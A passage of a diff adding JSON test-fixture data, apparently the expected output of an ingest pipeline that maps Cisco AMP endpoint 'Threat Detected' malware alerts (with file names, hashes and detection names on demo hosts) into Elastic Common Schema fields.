+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581784321Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533668103677542000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533668103677542426",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:14:55.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581786193Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533668103677542000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533668103677542425",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:13:54.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581788054Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533667841684537000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533667841684537367",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:13:54.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581790080Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533667841684537000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DFC.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533667841684537366",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:13:54.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581791973Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533667841684537000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533667841684537365",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:13:53.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581793892Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176258118058508000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176258118058508361",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:13:53.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581795768Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533667837389570000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533667837389570068",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:13:41.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581797669Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176258066518901000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176258066518900808",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:13:29.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
